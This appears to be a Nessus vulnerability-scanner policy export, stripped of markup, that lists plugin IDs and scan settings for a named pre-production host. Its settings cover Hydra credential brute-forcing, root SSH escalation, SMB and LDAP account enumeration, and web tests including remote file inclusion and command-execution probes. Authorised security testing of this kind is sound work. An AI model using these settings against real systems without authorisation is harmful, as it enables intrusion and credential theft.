11284;36606;56166;33456;59427;20587;57907;50267;37302;41206;53724;14268;26009;49760;64236;16010;45336;33504;40211;15934;41330;16533;28285;26585;25067;41755;29443;56652;47799;16390;14222;46721;46196;36082;20033;28130;23854;29835;28998;11799;34293;64747;50148;43798;24510;28152;56906;44649;27483;36509;59250;41143;47455;30588;30523;25089;35327;12773;60811;20235;29684;25662;61446;20940;32229;55152;25367;65844;19022;12780;18060;54059;51934;64146;24702;53915;57094;36851;30461;27808;13740;63958;18888;43136;41611;54197;34481;46391;31247;39819;61611;16569;40988;15656;32663;38168;16051;43639;60062;62541;36501;38490;46522;33813;40375;14673;11989;23058;59243;56190;32868;46298;16549;21480;46605;20037;63365;49023;34341;51799;33902;21171;50552;13053;59975;39167;24722;26724;20375;24895;52144;29865;23852;53245;38253;28576;41421;65050;44781;17219;17654;52959;21464;13169;19780;22523;13002;50183;13134;20685;11420;15915;18400;32300;12391;25918;10182;32082;13191;61020;50566;19082;13887;63972;41770;52004;13483;30896;48268;30045;49962;28950;40844;48913;21387;44503;15636;33534;31198;31005;54416;44131;53916;22817;64448;44868;54055;47388;65431;18145;13928;29628;39862;24905;16163;27568;47472;60974;39969;62902;54471;64633;39264;65593;64272;60920;66525;12500;16806;65599;21816;49421;61234;56912;24596;32238;10588;20148;55207;17054;27767;44429;31179;16199;58596;35328;44112;11804;12472;13067;24347;24864;63716;24946;47600;65794;17436;40232;12602;29163;57989;19747;66917;65089;46960;50680;46285;28531;23850;31428;28117;21257;31355;22170;56998;53517;31935;57367;10153;65495;34712;22711;20306;27979;37617;64992;54739;45905;34883;26376;29006;65029;38720;14877;23749;15894;61459;54680;26566;33809;49823;20089;31345;59278;16947;34217;42543;66059;66289;49193;21674;42584;52402;62126;19943;14010;35157;32914;20970;48199;48948;65952;56696;26197;56684;62023;65835;22750;32042;14177;40531;62222;50327;10505;40065;37801;27225;25410;56512;56771;56224;32896;32261;24888;61201;52826;19702;34929;35946;46083;27181;28391;46313;12792;13119;54493;45346;54278;42513;48996;32953;35381;64716;38385;62527;34419;61194;32732;34072;10938;65987;49089;53896;43011;10837;55329;17042;57191;53199;60959;54315; + +TARGET +preprod.boardvantage.net + +throttle_scan +yes + +listen_address +0.0.0.0 + +non_simult_ports +139, 445, 3389 + +slice_network_addresses +no + +max_checks +5 + +stop_scan_on_disconnect +no + +host.max_simult_tcp_sessions +unlimited + +report_crashes +yes + +xmlrpc_listen_port +8834 + +whoami +famato + +audit_trail +no + +policy_uuid +D2A991B9-F116-4540-90DC-97BFA7DE615E + +reverse_lookup +no + +optimize_test +yes + +log_whole_attack +no + +ssl_cipher_list +strong + +cgi_path +/cgi-bin:/scripts + +unscanned_closed +no + +save_knowledge_base +no + +xmlrpc_no_referrer_check +yes + +use_kernel_congestion_detection +no + +listen_port +1241 + +auto_update +yes + +checks_read_timeout +5 + +plugins_timeout +320 + +auto_enable_dependencies +yes + +safe_checks +yes + +report_task_id +8c306ca5-5314-476a-34a6-d66657c2b837c62dc0206bd28ea3 + +allow_post_scan_editing +yes + +stop_scan_on_hang +no + +max_hosts +80 + +plugin_upload +yes + +reduce_connections_on_congestion +no + +feed_type +HomeFeed + +silent_dependencies +yes + +port_range +default + + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[file]:File containing machine readable results : +File containing machine readable results : +file + + + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[radio]:Mode +Mode +radio +Map applications;Just grab banners;Port scan only +Map applications;Just grab banners;Port scan only + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[checkbox]:Quicker +Quicker +checkbox +no +no + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[checkbox]:UDP scan (disabled in safe_checks) +UDP scan (disabled in safe_checks) +checkbox +no +no + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[checkbox]:SSL (disabled in safe_checks) +SSL (disabled in safe_checks) +checkbox +yes +yes + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[checkbox]:RPC (disabled in safe_checks) +RPC (disabled in safe_checks) +checkbox +yes +yes + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[entry]:Parallel tasks +Parallel tasks +entry + + + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[entry]:Connection retries +Connection retries +entry + + + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[entry]:Connection timeout +Connection timeout +entry + + + +amap (NASL wrapper) +14663 +amap (NASL wrapper)[entry]:Read timeout +Read timeout +entry + + + +SNMP settings +19762 +SNMP settings[entry]:Community name : +Community name : +entry +public +public + +SNMP settings +19762 +SNMP settings[entry]:Community name (1) : +Community name (1) : +entry + + + +SNMP settings +19762 +SNMP settings[entry]:Community name (2) : +Community name (2) : +entry + + + +SNMP settings +19762 +SNMP settings[entry]:Community name (3) : +Community name (3) : +entry + + + +SNMP settings +19762 +SNMP settings[entry]:UDP port : +UDP port : +entry +161 +161 + +SNMP settings +19762 +SNMP settings[entry]:SNMPv3 user name : +SNMPv3 user name : +entry + + + +SNMP settings +19762 +SNMP settings[password]:SNMPv3 authentication password : +SNMPv3 authentication password : +password + + + +SNMP settings +19762 +SNMP settings[radio]:SNMPv3 authentication algorithm : +SNMPv3 authentication algorithm : +radio +MD5;SHA1 +MD5;SHA1 + +SNMP settings +19762 +SNMP settings[password]:SNMPv3 privacy password : +SNMPv3 privacy password : +password + + + +SNMP settings +19762 +SNMP settings[radio]:SNMPv3 privacy algorithm : +SNMPv3 privacy algorithm : +radio +DES +DES + +Good MDM Settings +66963 +Good MDM Settings[entry]:GMC Server : +GMC Server : +entry + + + +Good MDM Settings +66963 +Good MDM Settings[entry]:Port : +Port : +entry + + + +Good MDM Settings +66963 +Good MDM Settings[entry]:Domain : +Domain : +entry + + + +Good MDM Settings +66963 +Good MDM Settings[entry]:Username : +Username : +entry + + + +Good MDM Settings +66963 +Good MDM Settings[password]:Password : +Password : +password + + + +Good MDM Settings +66963 +Good MDM Settings[checkbox]:SSL : +SSL : +checkbox +yes +yes + +Good MDM Settings +66963 +Good MDM Settings[checkbox]:Verify SSL Certificate : +Verify SSL Certificate : +checkbox +no +no + +SSH settings +14273 +SSH settings[entry]:SSH user name : +SSH user name : +entry +root +root + +SSH settings +14273 +SSH settings[password]:SSH password (unsafe!) : +SSH password (unsafe!) : +password + + + +SSH settings +14273 +SSH settings[file]:SSH public key to use : +SSH public key to use : +file + + + +SSH settings +14273 +SSH settings[file]:SSH private key to use : +SSH private key to use : +file + + + +SSH settings +14273 +SSH settings[password]:Passphrase for SSH key : +Passphrase for SSH key : +password + + + +SSH settings +14273 +SSH settings[radio]:Elevate privileges with : +Elevate privileges with : +radio +Nothing;sudo;su;su+sudo;dzdo;pbrun;Cisco 'enable' +Nothing;sudo;su;su+sudo;Cisco 'enable' + +SSH settings +14273 +SSH settings[entry]:Privilege elevation binary path (directory) : +Privilege elevation binary path (directory) : +entry + + + +SSH settings +14273 +SSH settings[entry]:su login : +su login : +entry + + + +SSH settings +14273 +SSH settings[entry]:Escalation account : +Escalation account : +entry +root +root + +SSH settings +14273 +SSH settings[password]:Escalation password : +Escalation password : +password + + + +SSH settings +14273 +SSH settings[file]:SSH known_hosts file : +SSH known_hosts file : +file + + + +SSH settings +14273 +SSH settings[entry]:Preferred SSH port : +Preferred SSH port : +entry +22 +22 + +SSH settings +14273 +SSH settings[entry]:Client version : +Client version : +entry +OpenSSH_5.0 +OpenSSH_5.0 + +SSH settings +14273 +SSH settings[entry]:Additional SSH user name (1) : +Additional SSH user name (1) : +entry + + + +SSH settings +14273 +SSH settings[password]:Additional SSH password (1) : +Additional SSH password (1) : +password + + + +SSH settings +14273 +SSH settings[entry]:Additional SSH user name (2) : +Additional SSH user name (2) : +entry + + + +SSH settings +14273 +SSH settings[password]:Additional SSH password (2) : +Additional SSH password (2) : +password + + + +SSH settings +14273 +SSH settings[entry]:Additional SSH user name (3) : +Additional SSH user name (3) : +entry + + + +SSH settings +14273 +SSH settings[password]:Additional SSH password (3) : +Additional SSH password (3) : +password + + + +SSH settings +14273 +SSH settings[entry]:Additional SSH user name (4) : +Additional SSH user name (4) : +entry + + + +SSH settings +14273 +SSH settings[password]:Additional SSH password (4) : +Additional SSH password (4) : +password + + + +SSH settings +14273 +SSH settings[entry]:Additional SSH user name (5) : +Additional SSH user name (5) : +entry + + + +SSH settings +14273 +SSH settings[password]:Additional SSH password (5) : +Additional SSH password (5) : +password + + + +Hydra: LDAP +15877 +Hydra: LDAP[entry]:DN : +DN : +entry + + + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[entry]:Apple Profile Manager server : +Apple Profile Manager server : +entry + + + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[entry]:Apple Profile Manager port : +Apple Profile Manager port : +entry +443 +443 + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[entry]:Apple Profile Manager username : +Apple Profile Manager username : +entry + + + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[password]:Apple Profile Manager password : +Apple Profile Manager password : +password + + + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[checkbox]:SSL : +SSL : +checkbox +yes +yes + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[checkbox]:Verify SSL Certificate : +Verify SSL Certificate : +checkbox +no +no + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[checkbox]:Force Device Updates : +Force Device Updates : +checkbox +yes +yes + +Apple Profile Manager API Settings +60032 +Apple Profile Manager API Settings[entry]:Device Update Timeout (Minutes) : +Device Update Timeout (Minutes) : +entry +5 +5 + +Remote web server screenshot +59861 +Remote web server screenshot[checkbox]:Allow Nessus to connect to the cloud to take a screenshot of the public targets +Allow Nessus to connect to the cloud to take a screenshot of the public targets +checkbox +no +no + +Patch Management: Red Hat Satellite Server Settings +57063 +Patch Management: Red Hat Satellite Server Settings[entry]:Red Hat Satellite server(s) [separated w/ semicolons] : +Red Hat Satellite server(s) [separated w/ semicolons] : +entry + + + +Patch Management: Red Hat Satellite Server Settings +57063 +Patch Management: Red Hat Satellite Server Settings[entry]:Red Hat Satellite port(s) : +Red Hat Satellite port(s) : +entry +443 +443 + +Patch Management: Red Hat Satellite Server Settings +57063 +Patch Management: Red Hat Satellite Server Settings[checkbox]:Verify SSL certificates : +Verify SSL certificates : +checkbox +no +no + +Patch Management: Red Hat Satellite Server Settings +57063 +Patch Management: Red Hat Satellite Server Settings[entry]:Red Hat Satellite username(s) : +Red Hat Satellite username(s) : +entry + + + +Patch Management: Red Hat Satellite Server Settings +57063 +Patch Management: Red Hat Satellite Server Settings[password]:Red Hat Satellite password(s) : +Red Hat Satellite password(s) : +password + + + +Hydra: HTTP +15873 +Hydra: HTTP[entry]:Web page : +Web page : +entry + + + +SMB Scope +10917 +SMB Scope[checkbox]:Request information about the domain +Request information about the domain +checkbox +yes +yes + +VMware SOAP API Settings +57395 +VMware SOAP API Settings[entry]:VMware user name : +VMware user name : +entry + + + +VMware SOAP API Settings +57395 +VMware SOAP API Settings[password]:VMware password : +VMware password : +password + + + +VMware SOAP API Settings +57395 +VMware SOAP API Settings[checkbox]:Ignore SSL Certificate : +Ignore SSL Certificate : +checkbox +no +no + +Login configurations +10870 +Login configurations[entry]:HTTP account : +HTTP account : +entry + + + +Login configurations +10870 +Login configurations[password]:HTTP password (sent in clear) : +HTTP password (sent in clear) : +password + + + +Login configurations +10870 +Login configurations[entry]:NNTP account : +NNTP account : +entry + + + +Login configurations +10870 +Login configurations[password]:NNTP password (sent in clear) : +NNTP password (sent in clear) : +password + + + +Login configurations +10870 +Login configurations[entry]:FTP account : +FTP account : +entry +anonymous +anonymous + +Login configurations +10870 +Login configurations[password]:FTP password (sent in clear) : +FTP password (sent in clear) : +password +nessus@nessus.org +********* + +Login configurations +10870 +Login configurations[entry]:FTP writeable directory : +FTP writeable directory : +entry +/incoming +/incoming + +Login configurations +10870 +Login configurations[entry]:POP2 account : +POP2 account : +entry + + + +Login configurations +10870 +Login configurations[password]:POP2 password (sent in clear) : +POP2 password (sent in clear) : +password + + + +Login configurations +10870 +Login configurations[entry]:POP3 account : +POP3 account : +entry + + + +Login configurations +10870 +Login configurations[password]:POP3 password (sent in clear) : +POP3 password (sent in clear) : +password + + + +Login configurations +10870 +Login configurations[entry]:IMAP account : +IMAP account : +entry + + + +Login configurations +10870 +Login configurations[password]:IMAP password (sent in clear) : +IMAP password (sent in clear) : +password + + + +Login configurations +10870 +Login configurations[entry]:SMB account : +SMB account : +entry + + + +Login configurations +10870 +Login configurations[password]:SMB password : +SMB password : +password + + + +Login configurations +10870 +Login configurations[entry]:SMB domain (optional) : +SMB domain (optional) : +entry + + + +Login configurations +10870 +Login configurations[radio]:SMB password type : +SMB password type : +radio +Password;LM Hash;NTLM Hash +Password;LM Hash;NTLM Hash + +Login configurations +10870 +Login configurations[entry]:Additional SMB account (1) : +Additional SMB account (1) : +entry + + + +Login configurations +10870 +Login configurations[password]:Additional SMB password (1) : +Additional SMB password (1) : +password + + + +Login configurations +10870 +Login configurations[entry]:Additional SMB domain (optional) (1) : +Additional SMB domain (optional) (1) : +entry + + + +Login configurations +10870 +Login configurations[entry]:Additional SMB account (2) : +Additional SMB account (2) : +entry + + + +Login configurations +10870 +Login configurations[password]:Additional SMB password (2) : +Additional SMB password (2) : +password + + + +Login configurations +10870 +Login configurations[entry]:Additional SMB domain (optional) (2) : +Additional SMB domain (optional) (2) : +entry + + + +Login configurations +10870 +Login configurations[entry]:Additional SMB account (3) : +Additional SMB account (3) : +entry + + + +Login configurations +10870 +Login configurations[password]:Additional SMB password (3) : +Additional SMB password (3) : +password + + + +Login configurations +10870 +Login configurations[entry]:Additional SMB domain (optional) (3) : +Additional SMB domain (optional) (3) : +entry + + + +Login configurations +10870 +Login configurations[checkbox]:Never send SMB credentials in clear text +Never send SMB credentials in clear text +checkbox +yes +yes + +Login configurations +10870 +Login configurations[checkbox]:Only use NTLMv2 +Only use NTLMv2 +checkbox +no +no + +Login configurations +10870 +Login configurations[checkbox]:Only use Kerberos authentication for SMB +Only use Kerberos authentication for SMB +checkbox +no +no + +SMB Registry : Start the Registry Service during the scan +35703 +SMB Registry : Start the Registry Service during the scan[checkbox]:Start the registry service during the scan +Start the registry service during the scan +checkbox +no +no + +SMB Registry : Start the Registry Service during the scan +35703 +SMB Registry : Start the Registry Service during the scan[checkbox]:Enable administrative shares during the scan +Enable administrative shares during the scan +checkbox +no +no + +Hydra: SMB +15884 +Hydra: SMB[radio]:Check local / domain accounts +Check local / domain accounts +radio +Local accounts; Domain Accounts; Either +Local accounts; Domain Accounts; Either + +Hydra: SMB +15884 +Hydra: SMB[checkbox]:Interpret passwords as NTLM hashes +Interpret passwords as NTLM hashes +checkbox +no +no + +Patch Management: SCCM Server Settings +57029 +Patch Management: SCCM Server Settings[entry]:SCCM Server : +SCCM Server : +entry + + + +Patch Management: SCCM Server Settings +57029 +Patch Management: SCCM Server Settings[entry]:SCCM Domain : +SCCM Domain : +entry + + + +Patch Management: SCCM Server Settings +57029 +Patch Management: SCCM Server Settings[entry]:SCCM Username : +SCCM Username : +entry + + + +Patch Management: SCCM Server Settings +57029 +Patch Management: SCCM Server Settings[password]:SCCM Password : +SCCM Password : +password + + + +Palo Alto Networks PAN-OS Settings +64286 +Palo Alto Networks PAN-OS Settings[entry]:Palo Alto Username : +Palo Alto Username : +entry + + + +Palo Alto Networks PAN-OS Settings +64286 +Palo Alto Networks PAN-OS Settings[password]:Palo Alto Password : +Palo Alto Password : +password + + + +Palo Alto Networks PAN-OS Settings +64286 +Palo Alto Networks PAN-OS Settings[entry]:Palo Alto Port : +Palo Alto Port : +entry +443 +443 + +Palo Alto Networks PAN-OS Settings +64286 +Palo Alto Networks PAN-OS Settings[checkbox]:Verify SSL Certificate : +Verify SSL Certificate : +checkbox +no +no + +Port scanners settings +33812 +Port scanners settings[checkbox]:Check open TCP ports found by local port enumerators +Check open TCP ports found by local port enumerators +checkbox +no +no + +Port scanners settings +33812 +Port scanners settings[checkbox]:Only run network port scanners if local port enumeration failed +Only run network port scanners if local port enumeration failed +checkbox +yes +yes + +VMware vCenter SOAP API Settings +63060 +VMware vCenter SOAP API Settings[entry]:VMware vCenter host : +VMware vCenter host : +entry + + + +VMware vCenter SOAP API Settings +63060 +VMware vCenter SOAP API Settings[entry]:VMware vCenter port : +VMware vCenter port : +entry +443 +443 + +VMware vCenter SOAP API Settings +63060 +VMware vCenter SOAP API Settings[entry]:VMware vCenter user name : +VMware vCenter user name : +entry + + + +VMware vCenter SOAP API Settings +63060 +VMware vCenter SOAP API Settings[password]:VMware vCenter password : +VMware vCenter password : +password + + + +VMware vCenter SOAP API Settings +63060 +VMware vCenter SOAP API Settings[checkbox]:SSL : +SSL : +checkbox +yes +yes + +VMware vCenter SOAP API Settings +63060 +VMware vCenter SOAP API Settings[checkbox]:Verify SSL Certificate : +Verify SSL Certificate : +checkbox +no +no + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[entry]:Host : +Host : +entry +services.shavlik.com +services.shavlik.com + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[entry]:Port : +Port : +entry +443 +443 + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[entry]:Username : +Username : +entry + + + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[password]:Password : +Password : +password + + + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[entry]:Domain : +Domain : +entry + + + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[entry]:API path : +API path : +entry +/api/authenticationbroker/account/httpIssue.svc/ +/api/authenticationbroker/account/httpIssue.svc/ + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[entry]:Authentication realm : +Authentication realm : +entry +https://services.shavlik.com/api/dataservices/v1r1/default.aspx +https://services.shavlik.com/api/dataservices/v1r1/default.aspx + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[entry]:Service path : +Service path : +entry +/api/dataservices/v1r1/OData.svc/ +/api/dataservices/v1r1/OData.svc/ + +HTTP cookies import +42893 +HTTP cookies import[file]:Cookies file : +Cookies file : +file + + + +Ping the remote host +10180 +Ping the remote host[entry]:TCP ping destination port(s) : +TCP ping destination port(s) : +entry +built-in +built-in + +Ping the remote host +10180 +Ping the remote host[checkbox]:Do an ARP ping +Do an ARP ping +checkbox +yes +yes + +Ping the remote host +10180 +Ping the remote host[checkbox]:Do a TCP ping +Do a TCP ping +checkbox +yes +yes + +Ping the remote host +10180 +Ping the remote host[checkbox]:Do an ICMP ping +Do an ICMP ping +checkbox +yes +yes + +Ping the remote host +10180 +Ping the remote host[entry]:Number of retries (ICMP) : +Number of retries (ICMP) : +entry +2 +2 + +Ping the remote host +10180 +Ping the remote host[checkbox]:Do an applicative UDP ping (DNS,RPC...) +Do an applicative UDP ping (DNS,RPC...) +checkbox +no +no + +Ping the remote host +10180 +Ping the remote host[checkbox]:Make the dead hosts appear in the report +Make the dead hosts appear in the report +checkbox +no +no + +Ping the remote host +10180 +Ping the remote host[checkbox]:Log live hosts in the report +Log live hosts in the report +checkbox +no +no + +Ping the remote host +10180 +Ping the remote host[checkbox]:Test the local Nessus host +Test the local Nessus host +checkbox +yes +yes + +Ping the remote host +10180 +Ping the remote host[checkbox]:Fast network discovery +Fast network discovery +checkbox +no +no + +LDAP 'Domain Admins' Group Membership Enumeration +58038 +LDAP 'Domain Admins' Group Membership Enumeration[entry]:LDAP user : +LDAP user : +entry + + + +LDAP 'Domain Admins' Group Membership Enumeration +58038 +LDAP 'Domain Admins' Group Membership Enumeration[password]:LDAP password : +LDAP password : +password + + + +LDAP 'Domain Admins' Group Membership Enumeration +58038 +LDAP 'Domain Admins' Group Membership Enumeration[entry]:Max results : +Max results : +entry +1000 +1000 + +Global variable settings +12288 +Global variable settings[checkbox]:Probe services on every port +Probe services on every port +checkbox +yes +yes + +Global variable settings +12288 +Global variable settings[checkbox]:Do not log in with user accounts not specified in the policy +Do not log in with user accounts not specified in the policy +checkbox +no +no + +Global variable settings +12288 +Global variable settings[checkbox]:Enable CGI scanning +Enable CGI scanning +checkbox +no +yes + +Global variable settings +12288 +Global variable settings[radio]:Network type +Network type +radio +Mixed (use RFC 1918);Private LAN;Public WAN (Internet) +Mixed (use RFC 1918) + +Global variable settings +12288 +Global variable settings[checkbox]:Enable experimental scripts +Enable experimental scripts +checkbox +no +no + +Global variable settings +12288 +Global variable settings[checkbox]:Thorough tests (slow) +Thorough tests (slow) +checkbox +no +no + +Global variable settings +12288 +Global variable settings[radio]:Report verbosity +Report verbosity +radio +Normal;Quiet;Verbose +Normal + +Global variable settings +12288 +Global variable settings[radio]:Report paranoia +Report paranoia +radio +Normal;Avoid false alarms;Paranoid (more false alarms) +Normal + +Global variable settings +12288 +Global variable settings[entry]:HTTP User-Agent +HTTP User-Agent +entry +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) + +Global variable settings +12288 +Global variable settings[file]:SSL certificate to use : +SSL certificate to use : +file + + + +Global variable settings +12288 +Global variable settings[file]:SSL CA to trust : +SSL CA to trust : +file + + + +Global variable settings +12288 +Global variable settings[file]:SSL key to use : +SSL key to use : +file + + + +Global variable settings +12288 +Global variable settings[password]:SSL password for SSL key : +SSL password for SSL key : +password + + + +Hydra: SAP R3 +15883 +Hydra: SAP R3[entry]:Client ID (between 0 and 99) : +Client ID (between 0 and 99) : +entry + + + +Cleartext protocols settings +21744 +Cleartext protocols settings[entry]:User name : +User name : +entry + + + +Cleartext protocols settings +21744 +Cleartext protocols settings[password]:Password (unsafe!) : +Password (unsafe!) : +password + + + +Cleartext protocols settings +21744 +Cleartext protocols settings[checkbox]:Try to perform patch level checks over telnet +Try to perform patch level checks over telnet +checkbox +no +no + +Cleartext protocols settings +21744 +Cleartext protocols settings[checkbox]:Try to perform patch level checks over rsh +Try to perform patch level checks over rsh +checkbox +no +no + +Cleartext protocols settings +21744 +Cleartext protocols settings[checkbox]:Try to perform patch level checks over rexec +Try to perform patch level checks over rexec +checkbox +no +no + +IBM iSeries Credentials +57861 +IBM iSeries Credentials[entry]:Login : +Login : +entry + + + +IBM iSeries Credentials +57861 +IBM iSeries Credentials[password]:Password : +Password : +password + + + +SMB Use Domain SID to Enumerate Users +10399 +SMB Use Domain SID to Enumerate Users[entry]:Start UID : +Start UID : +entry +1000 +1000 + +SMB Use Domain SID to Enumerate Users +10399 +SMB Use Domain SID to Enumerate Users[entry]:End UID : +End UID : +entry +1200 +1200 + +Do not scan fragile devices +22481 +Do not scan fragile devices[checkbox]:Scan Network Printers +Scan Network Printers +checkbox +no +no + +Do not scan fragile devices +22481 +Do not scan fragile devices[checkbox]:Scan Novell Netware hosts +Scan Novell Netware hosts +checkbox +no +no + +Hydra: HTTP proxy +15874 +Hydra: HTTP proxy[entry]:Web site (optional) : +Web site (optional) : +entry + + + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Enable Nikto +Enable Nikto +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Disable if server never replies 404 +Disable if server never replies 404 +checkbox +yes +yes + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[entry]:Root directory +Root directory +entry + + + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[entry]:Pause between tests (s) +Pause between tests (s) +entry + + + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[radio]:Scan CGI directories +Scan CGI directories +radio +User supplied;All;None +User supplied;All;None + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Display: 1 Show redirects +Display: 1 Show redirects +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Display: 2 Show cookies received +Display: 2 Show cookies received +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Display: 3 Show all 200/OK responses +Display: 3 Show all 200/OK responses +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Display: 4 Show URLs which require authentication +Display: 4 Show URLs which require authentication +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Display: V Verbose Output +Display: V Verbose Output +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 1 Interesting File / Seen in logs +Tuning: 1 Interesting File / Seen in logs +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 2 Misconfiguration / Default File +Tuning: 2 Misconfiguration / Default File +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 3 Information Disclosure +Tuning: 3 Information Disclosure +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 4 Injection (XSS/Script/HTML) +Tuning: 4 Injection (XSS/Script/HTML) +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 5 Remote File Retrieval - Inside Web Root +Tuning: 5 Remote File Retrieval - Inside Web Root +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 6 Denial of Service +Tuning: 6 Denial of Service +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 7 Remote File Retrieval - Server Wide +Tuning: 7 Remote File Retrieval - Server Wide +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 8 Command Execution / Remote Shell +Tuning: 8 Command Execution / Remote Shell +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 9 SQL Injection +Tuning: 9 SQL Injection +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 0 File Upload +Tuning: 0 File Upload +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: a Authentication Bypass +Tuning: a Authentication Bypass +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: b Software Identification +Tuning: b Software Identification +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: c Remote Source Inclusion +Tuning: c Remote Source Inclusion +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: x Reverse Tuning Options (i.e., include all except specified) +Tuning: x Reverse Tuning Options (i.e., include all except specified) +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Mutate: 1 Test all files with all root directories +Mutate: 1 Test all files with all root directories +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Mutate: 2 Guess for password file names +Mutate: 2 Guess for password file names +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Mutate: 3 Enumerate user names via Apache (/~user type requests) +Mutate: 3 Enumerate user names via Apache (/~user type requests) +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Mutate: 4 Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests) +Mutate: 4 Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests) +checkbox +no +no + +Oracle Settings +22076 +Oracle Settings[entry]:Oracle SID : +Oracle SID : +entry + + + +Oracle Settings +22076 +Oracle Settings[checkbox]:Test default accounts (slow) +Test default accounts (slow) +checkbox +no +no + +Web Application Tests Settings +39471 +Web Application Tests Settings[checkbox]:Enable web applications tests +Enable web applications tests +checkbox +no +yes + +Web Application Tests Settings +39471 +Web Application Tests Settings[entry]:Maximum run time (min) : +Maximum run time (min) : +entry +60 +60 + +Web Application Tests Settings +39471 +Web Application Tests Settings[checkbox]:Try all HTTP methods +Try all HTTP methods +checkbox +no +no + +Web Application Tests Settings +39471 +Web Application Tests Settings[radio]:Combinations of arguments values +Combinations of arguments values +radio +one value;some pairs;all pairs (slower but efficient);some combinations;all combinations (extremely slow) +some pairs + +Web Application Tests Settings +39471 +Web Application Tests Settings[checkbox]:HTTP Parameter Pollution +HTTP Parameter Pollution +checkbox +no +no + +Web Application Tests Settings +39471 +Web Application Tests Settings[radio]:Stop at first flaw +Stop at first flaw +radio +per CGI;per port (quicker);per parameter (slow);look for all flaws (slower) +per CGI + +Web Application Tests Settings +39471 +Web Application Tests Settings[checkbox]:Test embedded web servers +Test embedded web servers +checkbox +no +no + +Web Application Tests Settings +39471 +Web Application Tests Settings[entry]:URL for Remote File Inclusion : +URL for Remote File Inclusion : +entry +http://rfi.nessus.org/rfi.txt +http://rfi.nessus.org/rfi.txt + +Nessus TCP scanner +10335 +Nessus TCP scanner[radio]:Firewall detection : +Firewall detection : +radio +Automatic (normal);Disabled (softer);Do not detect RST rate limitation (soft);Ignore closed ports (aggressive) +Automatic (normal);Disabled (softer);Do not detect RST rate limitation (soft);Ignore closed ports (aggressive) + +HTTP login page +11149 +HTTP login page[entry]:Login page : +Login page : +entry +/ +/ + +HTTP login page +11149 +HTTP login page[entry]:Login form : +Login form : +entry + + + +HTTP login page +11149 +HTTP login page[entry]:Login form fields : +Login form fields : +entry +user=%USER%&pass=%PASS% +user=%USER%&pass=%PASS% + +HTTP login page +11149 +HTTP login page[radio]:Login form method : +Login form method : +radio +POST;GET +POST;GET + +HTTP login page 